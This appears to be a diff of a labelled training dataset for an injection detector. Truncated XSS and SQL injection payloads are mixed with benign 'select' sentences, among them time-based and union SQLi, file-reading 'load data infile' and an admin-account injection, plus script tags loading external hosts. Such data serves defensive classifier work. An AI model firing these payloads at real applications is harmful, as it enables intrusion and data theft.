xlink:href=//jsfiddle.net/t846h/"">click",1,XSS,920 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHA",2,SQLi,10704 +"<svg><animate xlink:href=""#x"" attributeName=""href""",1,XSS,166 +Select jog.,0,normal,24642 +"1',iif ( 6625 = 6625,1,1/0 )",2,SQLi,22462 +"<isindex onkeyup=""alert(1)"" contenteditable>test</",1,XSS,6647 +select ( case when ( 8808 = 1367 ) then 1 else 880,2,SQLi,14337 +-9650' ) or 1390 = 3209,2,SQLi,16288 +"1 ) where 3076 = 3076 union all select null,null,n",2,SQLi,14285 +"<style draggable=""true"" ondragenter=""alert(1)"">tes",1,XSS,4597 +"-3699%' ) ) ) union all select 8241,8241,8241,8241",2,SQLi,19351 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))#",2,SQLi,10701 +"1' in boolean mode ) or 6979 = like ( 'abcdefg',up",2,SQLi,13302 +"<tr draggable=""true"" ondragstart=""alert(1)"">test</",1,XSS,2852 +"-2086%' ) ) ) or make_set ( 9354 = 9354,7185 ) and",2,SQLi,19215 +"-1438 where 6759 = 6759 union all select 6759,6759",2,SQLi,12641 +"{""id"":null,""name"":""instance""}",0,normal,27491 +<header id=x tabindex=1 onfocusin=alert(1)></heade,1,XSS,4463 +I'm considering where to spend my summer vacation.,0,normal,23922 +1'|| ( select 'odud' from dual where 2468 = 2468 o,2,SQLi,14911 +"<style>@keyframes x{}</style><hr style=""animation-",1,XSS,6626 +"<stylesheet xmlns=""http://www.w3.org/TR/WD-xsl"">",1,XSS,9309 +The Financials Select Sector SPDR Fund (XLF) close,0,normal,25444 +"<noembed onkeypress=""alert(1)"" contenteditable>tes",1,XSS,8493 +"?base=javascript:alert(0)"",",1,XSS,9870 +"<noembed draggable=""true"" ondrag=""alert(1)"">test</",1,XSS,2737 +"<canvas onpaste=""alert(1)"" contenteditable>test</c",1,XSS,5672 +"; if not ( substring ( ( select @@version ) ,25,1 ",2,SQLi,12034 +1' or 9643 = ( select count ( * ) from domain.doma,2,SQLi,21375 +"Discussions on set subjects were held, select pass",0,normal,26237 +"<details draggable=""true"" ondragstart=""alert(1)"">t",1,XSS,2380 +-4047'|| ( select 'rqta' from dual where 9743 = 97,2,SQLi,15626 +1' ) ) as hqhs where 5383 = 5383,2,SQLi,22420 +"<noembed onmouseup=""alert(1)"">test</noembed>",1,XSS,4175 +"1"" ) ) as fhlg where 1004 = 1004 and 2853 = cast (",2,SQLi,12394 +1'+ ( select 'zirh' where 9054 = 9054 and 3824 = b,2,SQLi,12745 +1' ) ) or ( select 9173 from ( select count ( * ) ,2,SQLi,16106 +Order a warm latte.,0,normal,22593 +1' ) where 5145 = 5145,2,SQLi,14013 "<image src=1 href=1 onerror=""javascript:alert(1)"">",1,XSS,366 -"<command onclick=""alert(1)"">test</command>",1,XSS,2104 -"1%' ) ) and elt ( 4483 = 5364,5364 ) and ( ( '%' =",2,SQLi,20144 +<img2 onpointermove=alert(1)>XSS</img2>,1,XSS,2105 +1 ) ) as efjb where 4642 = 4642 order by 1#,2,SQLi,20146 <!--[if<img src=x onerror=javascript:alert(1)//]> ,1,XSS,690 -"1' ) and 4241 = convert ( int, ( select char ( 113",2,SQLi,18222 -Select the channel.,0,normal,24817 -1'|| ( select 'mjkz' where 9430 = 9430 ( select ( ,2,SQLi,19260 -onmouseover=alert(/Black.Spook/),1,XSS,9733 -<style>:target {transform: rotate(180deg);}</style,1,XSS,5711 -"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,16035 -"-5526 or 1 group by concat ( 0x7171706a71, ( selec",2,SQLi,20885 -1' ) and 6537 = dbms_pipe.receive_message ( chr ( ,2,SQLi,15229 -"perl -e 'print \""&lt;IMG SRC=java\0script&#058;ale",1,XSS,1094 -"-1653 union all select 8415,8415,8415,8415,8415,84",2,SQLi,18966 -"<meter onmousemove=""alert(1)"">test</meter>",1,XSS,6719 +-4873' ) ) ) or 3038 = 3038,2,SQLi,18224 +Select a game.,0,normal,24814 +select sleep ( 5 ) and ( ( ( 'klma' = 'klma,2,SQLi,19262 +%3Cimg/src=%3Dx+onload=alert(2)%3D,1,XSS,9735 +"<section onclick=""alert(1)"">test</section>",1,XSS,5713 +1' ) ) ) or ( select 2* ( if ( ( select * from ( s,2,SQLi,16037 +1 ) ) as dhqt where 8485 = 8485 waitfor delay '0:0,2,SQLi,20887 +1 and ( select * from ( select ( sleep ( 5 ) ) ) f,2,SQLi,15231 +"&lt;IMG SRC=\""jav&#x0D;ascript&#058;alert('XSS');\",1,XSS,1095 +call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,18968 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,6721 "{""id"":null,""name"":""Turtwig""}",0,normal,27397 -"1' ) ) ) and updatexml ( 3393,concat ( 0x2e,0x7171",2,SQLi,15900 --9556' ) where 2472 = 2472 or ( 2883 = 9968 ) *996,2,SQLi,16545 +"1"" ) and 7533 = 7533 and ( ""yqzq"" = ""yqzq",2,SQLi,15902 +-8812 or 6872 = 6872# dflr,2,SQLi,16547 "<a href=""javascript&colon;alert&lpar;1&rpar;"">XSS<",1,XSS,204 -call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,20325 -Select shock.,0,normal,24730 -"Formal logicians say that, if they had to consider",0,normal,26166 -"<iframe oncopy=""alert(1)"" contenteditable>test</if",1,XSS,4934 -or a=a--,2,SQLi,10007 +"1 where 2363 = 2363 union all select null,null,nul",2,SQLi,20327 +"If you select yes, the bank account is automatical",0,normal,26037 +"From the ""Select and Mask"" menu, simply click anyw",0,normal,26163 +"<hgroup ondblclick=""alert(1)"">test</hgroup>",1,XSS,4936 +) or ('a'='a,2,SQLi,10009 "{""id"":null,""name"":""Alakazam""}",0,normal,27566 -"<IMG SRC=x onprogress=""alert(String.fromCharCode(8",1,XSS,1231 --3186 or 3867 = 9405,2,SQLi,15797 -"1' where 1673 = 1673 and 4241 = convert ( int, ( s",2,SQLi,19431 -<discard onpointerleave=alert(1)>XSS</discard>,1,XSS,7958 -"1%"" ) ) or sleep ( 5 ) and ( ( ""%"" = """,2,SQLi,19300 -"Apple Pay is hitting select stations this Friday, ",0,normal,26359 -Select ship.,0,normal,24697 -Where's the festival?,0,normal,23585 -"<dl ondblclick=""alert(1)"">test</dl>",1,XSS,4252 -)))))) waitfor delay '0:0:20' /*,2,SQLi,22496 -1 ) where 6340 = 6340 and exp ( ~ ( select * from ,2,SQLi,15021 -1'|| ( select 'xyft' from dual where 8250 = 8250 a,2,SQLi,13441 -1'|| ( select 'kojx' from dual where 8140 = 8140 a,2,SQLi,12227 -"1 and extractvalue ( 7982,concat ( 0x5c,0x7171706a",2,SQLi,19110 -1' ) rlike ( select ( case when ( 7447 = 3981 ) th,2,SQLi,20675 -"<style>@keyframes x{}</style><li style=""animation-",1,XSS,4335 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2",2,SQLi,10745 -"{""id"":null,""firstName"":""Cherie"",""lastName"":""Draws""",0,normal,26946 -"select * from generate_series ( 9167,9167,case whe",2,SQLi,16768 -1 ) ) ) and 6358 = 6735,2,SQLi,13681 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7486 -"1 ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( 1915",2,SQLi,12946 -<big onpointerover=alert(1)>XSS</big>,1,XSS,4887 +"<IMG SRC=x onratechange=""alert(String.fromCharCode",1,XSS,1232 +1' ) ) as jmnw where 6496 = 6496 or 4411 = ( selec,2,SQLi,15799 +select ( case when ( 7163 = 1777 ) then 1 else 716,2,SQLi,19433 +<xmp onpointerout=alert(1)>XSS</xmp>,1,XSS,7960 +1%' ) ) and 8635 = ( select count ( * ) from gener,2,SQLi,19302 +Article: Select items up to 25% off (through July ,0,normal,26356 +Select unwrap.,0,normal,24694 +Where's the bar?,0,normal,23543 +<data onblur=alert(1) tabindex=1 id=x></data><inpu,1,XSS,4254 +create table myfile (input TEXT); load data infile,2,SQLi,22498 +"1%"" ) ) or ( select 9173 from ( select count ( * )",2,SQLi,15023 +"-9318"" ) ) ) union all select 5223,5223,5223,5223#",2,SQLi,13443 +"-9854 ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ",2,SQLi,12229 +1'|| ( select 'tcfy' where 4546 = 4546 and 6969 = ,2,SQLi,19112 +if ( 6767 = 5022 ) select 6767 else drop function ,2,SQLi,20677 +"<time onmouseenter=""alert(1)"">test</time>",1,XSS,4337 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4",2,SQLi,10747 +"{""id"":null,""firstName"":""Ong"",""lastName"":""Zhi Rong""",0,normal,26943 +1%' waitfor delay '0:0:5'--,2,SQLi,16770 +1' ) as kgnd where 1550 = 1550 and 3202 = like ( ',2,SQLi,13683 +<body onpointerenter=alert(1)>XSS</body>,1,XSS,7488 +"1"" ) as rqpp where 9383 = 9383 or 7417 = ( select ",2,SQLi,12948 +<input2 onpointerdown=alert(1)>XSS</input2>,1,XSS,4889 <form><textarea &#13; onkeyup='\u0061\u006C\u0065\,1,XSS,858 -"-6595 ) ) ) union all select 2688,2688,2688,2688,2",2,SQLi,16755 -"<video oncontextmenu=""alert(1)"">test</video>",1,XSS,6540 -1' where 1085 = 1085 or 8315 = ( select count ( * ,2,SQLi,18946 -1' ) as zxho where 5907 = 5907 or 6979 = like ( 'a,2,SQLi,20186 -1%' ) or 4411 = ( select count ( * ) from sysusers,2,SQLi,21840 -Please select one.,0,normal,24782 -1 ) rlike ( select ( case when ( 8488 = 1270 ) the,2,SQLi,12683 -"UNION ALL SELECT 1,2,3,4,5,6,7,8#",2,SQLi,10540 -"<base onmouseenter=""alert(1)"">test</base>",1,XSS,8842 -<isindex type=image src=1 onerror=alert(1)>,1,XSS,6860 -#ERROR!,2,SQLi,10974 -Join the chat.,0,normal,22857 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10626 +1' ) as vlwh where 9403 = 9403 or elt ( 5873 = 587,2,SQLi,16757 +"<shadow oncut=""alert(1)"" contenteditable>test</sha",1,XSS,6542 +"1%' and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 1",2,SQLi,18948 +"1' ) where 8348 = 8348 and elt ( 4249 = 4249,7259 ",2,SQLi,20188 +"1"" ) ) or char ( 119 ) ||char ( 100 ) ||char ( 99 ",2,SQLi,21842 +Modify layout.,0,normal,22802 +1' ) ) ) and 6537 = dbms_pipe.receive_message ( ch,2,SQLi,12685 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10#",2,SQLi,10542 +"<marquee onmouseup=""alert(1)"">test</marquee>",1,XSS,8844 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6862 +#ERROR!,2,SQLi,10976 +"Now, #KnockDownTheHouse hits Netflix & select thea",0,normal,25858 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10628 <input onfocus=write(XSS) autofocus>,1,XSS,955 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7405 -<video id=x tabindex=1 ondeactivate=alert(1)></vid,1,XSS,5945 -1 ) as amgf where 4308 = 4308 and char ( 120 ) ||c,2,SQLi,17000 -"-5355"" or make_set ( 9354 = 9354,7185 )",2,SQLi,18960 +"<form draggable=""true"" ondragstart=""alert(1)"">test",1,XSS,7407 +"<button onbeforecut=""alert(1)"" contenteditable>tes",1,XSS,5947 +1 ) ) as rcbz where 4563 = 4563 and 2006 = 2006,2,SQLi,17002 +1' ) ) and char ( 107 ) ||char ( 121 ) ||char ( 97,2,SQLi,18962 <input onchange=alert(1) value=xss>,1,XSS,54 -"<style>@keyframes slidein {}</style><title style=""",1,XSS,6411 -"1%' ) ) ) union all select null,null,null,null,nul",2,SQLi,19725 -<style>:target {transform: rotate(180deg);}</style,1,XSS,3517 -1'|| ( select 'xbwg' where 7518 = 7518 union all s,2,SQLi,19276 -"-7514%"" ) ) ) or 2448 = 8797#",2,SQLi,20030 -"-8477' union all select 2517,2517,2517--",2,SQLi,22261 -select * from users where id = 1 or $<\. or 1 = 1 ,2,SQLi,11749 +"<details onmouseout=""alert(1)"">test</details>",1,XSS,6413 +"1 or elt ( 6272 = 6272,sleep ( 5 ) )",2,SQLi,19727 +"<nobr onkeydown=""alert(1)"" contenteditable>test</n",1,XSS,3519 +"1%"" or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ",2,SQLi,19278 +"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,20032 +"1"" where 4319 = 4319",2,SQLi,22263 +or 'whatever' in ( 'whatever' ),2,SQLi,11751 "<a href=""\x0Fjavascript:javascript:alert(1)"" id=""f",1,XSS,490 -1'+ ( select unzl where 3432 = 3432 union all sele,2,SQLi,13146 -"1' ) where 6731 = 6731 or elt ( 5873 = 5873,sleep ",2,SQLi,15936 -1%' ) and ( select * from ( select ( sleep ( 5 ) ),2,SQLi,18197 -Select your appeal.,0,normal,24941 -"1"" ) where 8953 = 8953 or 5356 = ( select count ( ",2,SQLi,17375 -"{""id"":null,""name"":""numeral""}",0,normal,27138 -Where's the beach house?,0,normal,23555 -select * from users where id = 1.*1 or 1 = 1 -- 1,2,SQLi,11706 -"<script draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,2973 -Supreme Court Justice Antonin Scalia has given som,0,normal,25512 -<rb id=x tabindex=1 onbeforeactivate=alert(1)></rb,1,XSS,2943 -<textarea autofocus onfocusin=alert(1)>test</texta,1,XSS,3164 -1%' ) and 8635 = ( select count ( * ) from generat,2,SQLi,21063 -"<ul onclick=""alert(1)"">test</ul>",1,XSS,2619 -1'|| ( select 'dsjg' where 2402 = 2402 and 1947 = ,2,SQLi,19997 -<rt onpointerenter=alert(1)>XSS</rt>,1,XSS,8236 -"1"" ) ) as uqkn where 4642 = 4642 or elt ( 6272 = 6",2,SQLi,21715 -"select * from users where id = 1 or 1#"", union sel",2,SQLi,11619 -1 ) as jvuo where 6859 = 6859 union all select nul,2,SQLi,20177 -", if not ( ( select serverproperty ( 'isintegrated",2,SQLi,11764 -select * from users where id = '1' union select \#,2,SQLi,11578 -<spacer onfocusout=alert(1) tabindex=1 id=x></spac,1,XSS,2855 -"<abbr draggable=""true"" ondragstart=""alert(1)"">test",1,XSS,3440 -"<content onmouseleave=""alert(1)"">test</content>",1,XSS,1893 -1,0,normal,26703 -"1"" ) ) waitfor delay '0:0:5' and ( ( ""koni"" like """,2,SQLi,21640 -1' in boolean mode ) and 8594 = ( select 8594 from,2,SQLi,15769 -"-4679 where 9634 = 9634 union all select 9634,9634",2,SQLi,21552 -"-1269' or 1570 = convert ( int, ( select char ( 11",2,SQLi,13007 -select * from users where id = '1' *$ 1 or 1 = 1 -,2,SQLi,11768 -call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,17890 +1%' ) and 8514 = ( select count ( * ) from domain.,2,SQLi,13148 +"1%' ) union all select null,null--",2,SQLi,15938 +"1%"" ) ) or 6793 = ( select 6793 from pg_sleep ( 5 ",2,SQLi,18199 +Select your prayer.,0,normal,24938 +"-1737' or 1570 = convert ( int, ( select char ( 11",2,SQLi,17377 +"{""id"":null,""firstName"":""Zi"",""lastName"":""Jian"",""add",0,normal,27550 +Where's the campground?,0,normal,23552 +select * from users where id = 1 or $<\. union sel,2,SQLi,11708 +<basefont onpointerleave=alert(1)>XSS</basefont>,1,XSS,2974 +Take 40% off select women's boots and shoes includ,0,normal,25509 +<bgsound onpointerup=alert(1)>XSS</bgsound>,1,XSS,2944 +<s id=x tabindex=1 onbeforeactivate=alert(1)></s>,1,XSS,3166 +"select count ( * ) from domain.domains as t1,domai",2,SQLi,21065 +<style>:target {color:red;}</style><thead id=x sty,1,XSS,2620 +"1"" ) where 1807 = 1807",2,SQLi,19999 +<animatemotion onpointerleave=alert(1)>XSS</animat,1,XSS,8238 +"1"" ) ) as knyf where 8109 = 8109 or 8384 = like ( ",2,SQLi,21717 +select * from users where id = 1 union select null,2,SQLi,11621 +"1%"" or sleep ( 5 ) #",2,SQLi,20179 +select * from users where id = 1 <@<@ union select,2,SQLi,11766 +""" or true--",2,SQLi,11580 +"<abbr onkeydown=""alert(1)"" contenteditable>test</a",1,XSS,2856 +"<cite onmousedown=""alert(1)"">test</cite>",1,XSS,3442 +"<fieldset onmouseover=""alert(1)"">test</fieldset>",1,XSS,1894 +1,0,normal,26700 +1 ) ) as jzzo where 7773 = 7773 union all select n,2,SQLi,21642 +"-3672"" ) ) union all select 6093#",2,SQLi,15771 +1' where 2967 = 2967,2,SQLi,21554 +"1"" or 5286 = ( select count ( * ) from all_users t",2,SQLi,13009 +"select * from users where id = 1 or ""?@"" or 1 = 1 ",2,SQLi,11770 +"1%"" ) and 4241 = convert ( int, ( select char ( 11",2,SQLi,17892 "<img src\x47=x onerror=""javascript:alert(1)"">",1,XSS,671 -"{""id"":null,""firstName"":""Nagalingam Shanmuganathan""",0,normal,26840 -"-1475"" ) union all select 8611,8611,8611#",2,SQLi,15241 -"1"" ) ) or 8421 = ( select count ( * ) from generat",2,SQLi,14897 -<iframe/src=javascript:confirm(1),1,XSS,9472 -Select the perfect present for the occasion.,0,normal,24136 +"{""id"":null,""firstName"":""Ruchirashil"",""lastName"":""Y",0,normal,26837 +1' ) ) ) and 8189 = ( select count ( * ) from sysi,2,SQLi,15243 +"-2140 ) ) union all select 8174,8174,8174#",2,SQLi,14899 +alert(1);,1,XSS,9474 +Select the best candidate for the role.,0,normal,24133 "<meta http-equiv=""refresh"" content=""0;javascript&c",1,XSS,898 -"<isindex x=""javascript:"" onmouseover=""alert()"">",1,XSS,3307 -<hr onpointermove=alert(1)>XSS</hr>,1,XSS,8027 -""",NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,10859 -<del onpointerdown=alert(1)>XSS</del>,1,XSS,2891 -1' ) ) and 2006 = 2006,2,SQLi,22388 -Select a travel destination for your vacation.,0,normal,24193 -"1', ( select ( case when ( 5433 = 5433 ) then 1 el",2,SQLi,14395 -upper,0,normal,23190 -Where's the fortress?,0,normal,23574 -"<hgroup onkeydown=""alert(1)"" contenteditable>test<",1,XSS,8398 -"1"" ) as qayu where 6222 = 6222 union all select nu",2,SQLi,14006 -"1"" ) ) ) or 8156 = ( select count ( * ) from gener",2,SQLi,16387 -1%' ) or 7552 = ( select count ( * ) from rdb$fiel,2,SQLi,14163 -select * from users where id = '1' + ( \ ) union s,2,SQLi,11997 +"<progress onclick=""alert(1)"">test</progress>",1,XSS,3309 +<svg><bdo onload=alert(1)></bdo>,1,XSS,8029 +"),NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,10861 +<em onpointerout=alert(1)>XSS</em>,1,XSS,2892 +"-2197' union all select 8065,8065,8065,8065--",2,SQLi,22390 +Select a dish from the menu.,0,normal,24190 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,14397 +cast,0,normal,23187 +Where's the estate?,0,normal,23571 +<dt onpointerenter=alert(1)>XSS</dt>,1,XSS,8400 +"1"" ) ) or 1022 = ( select count ( * ) from all_use",2,SQLi,14008 +"1"" ) ) ) union all select null,null,null,null#",2,SQLi,16389 +1 ) as rtpl where 1262 = 1262 and 3202 = like ( 'a,2,SQLi,14165 +select * from users where id = 1 or $ 1 = 1 union ,2,SQLi,11999 "<head><base href=""javascript://""></head><body><a h",1,XSS,635 -1' ) as ywtu where 3009 = 3009 or 4915 = ( select ,2,SQLi,12509 -"1"" ) ) as hace where 8785 = 8785",2,SQLi,22464 -"1"" ) or 4915 = ( select count ( * ) from domain.do",2,SQLi,16916 -Search for a specific name or select one from the ,0,normal,25695 -Roma will premiere in select theaters and on Netfl,0,normal,25739 -"<style>@keyframes x{}</style><textarea style=""anim",1,XSS,6477 -"1%"" and 4241 = convert ( int, ( select char ( 113 ",2,SQLi,15170 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4178 -The collection — which launches today in select st,0,normal,25475 -"{""id"":null,""name"":""needed stretch""}",0,normal,27221 -’ or ‘1’=Ã��€™1,2,SQLi,11065 -"-5292' ) union all select 1439,1439,1439,1439#",2,SQLi,19791 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10532 -<center onblur=alert(1) tabindex=1 id=x></center><,1,XSS,5992 -Insert USB.,0,normal,23039 -1%' and 6454 = 8348 and '%' = ',2,SQLi,18950 -"<title draggable=""true"" ondragend=""alert(1)"">test<",1,XSS,2582 -Of the immense number of indications accompanying ,0,normal,25855 -select * from users where id = '1' or $<\ or 1 = 1,2,SQLi,12000 -<font onpointerenter=alert(1)>XSS</font>,1,XSS,8386 -1'|| ( select 'tjzy' where 3037 = 3037,2,SQLi,18992 -"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMA",2,SQLi,10675 -alert(document.domain),1,XSS,9448 -<img2 onpointermove=alert(1)>XSS</img2>,1,XSS,2105 -1,0,normal,26664 -I picked some fresh herbs from the backyard.,0,normal,23816 -"<style>@keyframes x{}</style><base style=""animatio",1,XSS,3765 -"<rp draggable=""true"" ondragend=""alert(1)"">test</rp",1,XSS,4235 -<output id=x tabindex=1 onactivate=alert(1)></outp,1,XSS,4995 -select,0,normal,26617 -<strike id=x tabindex=1 ondeactivate=alert(1)></st,1,XSS,5058 -1 ) and sleep ( 5 ) #,2,SQLi,17043 -"<datalist onmouseenter=""alert(1)"">test</datalist>",1,XSS,4435 -pg_sleep ( __TIME__ ) --,2,SQLi,11677 -X<x style=`behavior:url(#default#time2)` onbegin=`,1,XSS,718 -"<head onpaste=""alert(1)"" contenteditable>test</hea",1,XSS,3817 -<embed onblur=alert(1) tabindex=1 id=x></embed><in,1,XSS,6774 -`) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(S,2,SQLi,11187 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10739 -"-6662"" ) ) union all select 6755--",2,SQLi,14672 -><script+src=https://api.mixpanel.com/track/?callb,1,XSS,9814 -"{""id"":null,""name"":""blanket feet""}",0,normal,26839 -"1%"" ) ) ) and 6510 = ( select count ( * ) from sys",2,SQLi,20289 -High Fashion Home:High Fashion Home is offering 21,0,normal,26101 -<script>alert(“XSS”)</script>,1,XSS,9289 -<strong onpointerup=alert(1)>XSS</strong>,1,XSS,6812 -<rt onpointerover=alert(1)>XSS</rt>,1,XSS,3894 -<x%09onxxx=1,1,XSS,9360 -"1"" ) ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and (",2,SQLi,15130 -"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMA",2,SQLi,10656 -<label onpointerdown=alert(1)>XSS</label>,1,XSS,3701 -"<table oncopy=""alert(1)"" contenteditable>test</tab",1,XSS,7375 -1%' ) ) ) and 6969 = ( select 6969 from pg_sleep (,2,SQLi,18173 -<applet id=x tabindex=1 onbeforedeactivate=alert(1,1,XSS,6315 -1%' and 6510 = ( select count ( * ) from sysusers ,2,SQLi,12817 -"<header onmouseover=""alert(1)"">test</header>",1,XSS,3646 -1'|| ( select 'gbyh' from dual where 5889 = 5889 o,2,SQLi,18161 -"<svg><script>x=""&quot;,alert(1)//"";</script></svg>",1,XSS,193 -1' ) as jrqh where 6204 = 6204 and ( select * from,2,SQLi,13415 -"<META HTTP-EQUIV=""Link"" Content=""<http://ha.ckers.",1,XSS,817 -select,0,normal,26568 -"select count ( * ) from domain.domains as t1,domai",2,SQLi,15811 -"1%"" and 3715 in ( ( char ( 113 ) +char ( 113 ) +ch",2,SQLi,21773 -"<style onmousemove=""alert(1)"">test</style>",1,XSS,6161 -"1%"" ) ) and 3202 = like ( 'abcdefg',upper ( hex ( ",2,SQLi,15642 --2783%' ) ) or 4144 = ( select upper ( xmltype ( c,2,SQLi,21336 -"1' and ( select 9067 from ( select count ( * ) ,co",2,SQLi,19072 -"<style>@keyframes x{}</style><nav style=""animation",1,XSS,4391 -) AND SLEEP(5)#,2,SQLi,11165 -<title id=x tabindex=1 onbeforedeactivate=alert(1),1,XSS,4928 -"<svg draggable=""true"" ondrag=""alert(1)"">test</svg>",1,XSS,5553 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10800 -Select slowly.,0,normal,24484 -<svg><discard onbegin=alert(1)>,1,XSS,239 -1%' ) or ( select * from ( select ( sleep ( 5 ) ) ,2,SQLi,12208 -select,0,normal,26622 -) OR SLEEP(5)#,2,SQLi,11170 -Merge financial records for the annual report.,0,normal,22908 +1'|| ( select 'jmao' where 3009 = 3009,2,SQLi,12511 +1 rlike sleep ( 5 ),2,SQLi,22466 +select sleep ( 5 ) and 'beuk' = 'beuk,2,SQLi,16918 +"See Select Cases from the Coroners' Rolls, 1265-14",0,normal,25692 +Samsung EU 256 GB Evo Select Micro SD Card with Ad,0,normal,25736 +"<frame onmouseup=""alert(1)"">test</frame>",1,XSS,6479 +"1 ) or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c",2,SQLi,15172 +"<kbd oncopy=""alert(1)"" contenteditable>test</kbd>",1,XSS,4180 +The commissions in the three counties represented ,0,normal,25472 +"{""id"":null,""firstName"":""Elaine"",""lastName"":""Wong"",",0,normal,27219 +"|| myappadmin.adduser('admin', 'newpass') || '",2,SQLi,11067 +"1%"" ) ) ) union all select null,null#",2,SQLi,19793 +"UNION ALL SELECT 1,2#",2,SQLi,10534 +"<script onmousedown=""alert(1)"">test</script>",1,XSS,5994 +Create mural.,0,normal,23036 +1'|| ( select 'ogyu' from dual where 6691 = 6691,2,SQLi,18952 +"<sub onkeypress=""alert(1)"" contenteditable>test</s",1,XSS,2583 +"To copy an article, simply left click and drag the",0,normal,25278 +""" or 1 = 1--",2,SQLi,12002 +<frameset id=x tabindex=1 onactivate=alert(1)></fr,1,XSS,8388 +1' ) as fyib where 9246 = 9246,2,SQLi,18994 +"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMA",2,SQLi,10677 +</title><script x> alert(1) </script 1=2,1,XSS,9450 +<bdo id=x tabindex=1 onfocus=alert(1)></bdo>,1,XSS,2106 +1,0,normal,26661 +I want to select a game for family game night.,0,normal,23813 +<kbd id=x tabindex=1 onbeforeactivate=alert(1)></k,1,XSS,3767 "<hr onmousedown=""alert(1)"">test</hr>",1,XSS,4237 -"<ul draggable=""true"" ondragenter=""alert(1)"">test</",1,XSS,5619 -Select your favorite actor.,0,normal,24329 -<nextid onpointerover=alert(1)>XSS</nextid>,1,XSS,8641 -<caption id=x tabindex=1 onfocusin=alert(1)></capt,1,XSS,5098 -1 waitfor delay '0:0:5'-- nnnp,2,SQLi,14666 -"<style>@keyframes slidein {}</style><html style=""a",1,XSS,2243 -They planted colorful flowers.,0,normal,22998 -<th onpointerout=alert(1)>XSS</th>,1,XSS,3553 -1 where 6044 = 6044 or ( select 2* ( if ( ( select,2,SQLi,19390 -1%' and exp ( ~ ( select * from ( select concat ( ,2,SQLi,19745 -Find and select a TV show or movie to play. 3.,0,normal,26195 -<dir onpointerout=alert(1)>XSS</dir>,1,XSS,8329 -<wbr onpointerup=alert(1)>XSS</wbr>,1,XSS,5629 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10603 -1 ) where 9829 = 9829 or char ( 75 ) ||char ( 70 ),2,SQLi,22168 -"<slot onkeydown=""alert(1)"" contenteditable>test</s",1,XSS,4508 -The following is a select list of genera of miscel,0,normal,25442 -"end and ( ""qkkn"" like ""qkkn",2,SQLi,12175 --7469 ) where 5875 = 5875 or make_set ( 9354 = 935,2,SQLi,14454 -1' ) as afnt where 4719 = 4719 and elt ( 8224 = 12,2,SQLi,16531 -1' ) ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 1,2,SQLi,15094 -I'm considering where to go for a weekend retreat.,0,normal,23780 -<body onpointermove=alert(1)>XSS</body>,1,XSS,2295 -"select * from users where id = 1 or "" ) {"" or 1 = ",2,SQLi,11804 +"<hgroup onmouseleave=""alert(1)"">test</hgroup>",1,XSS,4997 +Let's choose a location for the party.,0,normal,23952 +"<spacer onmouseup=""alert(1)"">test</spacer>",1,XSS,5060 +"-3638"" union all select 4394,4394,4394,4394,4394,4",2,SQLi,17045 +"<address oncopy=""alert(1)"" contenteditable>test</a",1,XSS,4437 +select * from users where id = 1 -1<@ union select,2,SQLi,11679 +X<x style=`behavior:url(#default#time2)` onbegin=`,1,XSS,718 +"<rt onmousedown=""alert(1)"">test</rt>",1,XSS,3819 +<style>:target {color: red;}</style><embed id=x st,1,XSS,6776 +]-(SELECT 0 WHERE 1337=1337 AND (SELECT 1337 FROM ,2,SQLi,11189 +AND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(1,2,SQLi,10741 +1' ) ) ) and 9254 = ( select count ( * ) from rdb$,2,SQLi,14674 +><script+src=http://ads.pictela.net/a/proxy/shoplo,1,XSS,9816 +"{""id"":null,""firstName"":""Toh"",""lastName"":""Munsing"",",0,normal,26836 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,20291 +"His father's library, though large in comparison w",0,normal,26098 +"<script>d.innerHTML+='';</script>//[""'`-->]]>]</di",1,XSS,9291 +"<bgsound draggable=""true"" ondragenter=""alert(1)"">t",1,XSS,6814 +"<script onmouseenter=""alert(1)"">test</script>",1,XSS,3896 +<x%0Conxxx=1,1,XSS,9362 +"1%"" and 9660 = ( select count ( * ) from all_users",2,SQLi,15132 +"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMA",2,SQLi,10658 +"<acronym ondblclick=""alert(1)"">test</acronym>",1,XSS,3703 +"<img onmouseup=""alert(1)"">test</img>",1,XSS,7377 +"1"" ) ) and 7756 = 